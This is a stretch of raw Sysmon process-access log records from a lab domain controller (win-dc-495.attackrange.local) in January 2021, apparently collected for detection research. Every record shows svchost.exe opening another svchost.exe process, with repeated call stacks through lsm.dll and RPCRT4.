13:58:20.602{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.602{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.602{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.602{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.602{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:20.571{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 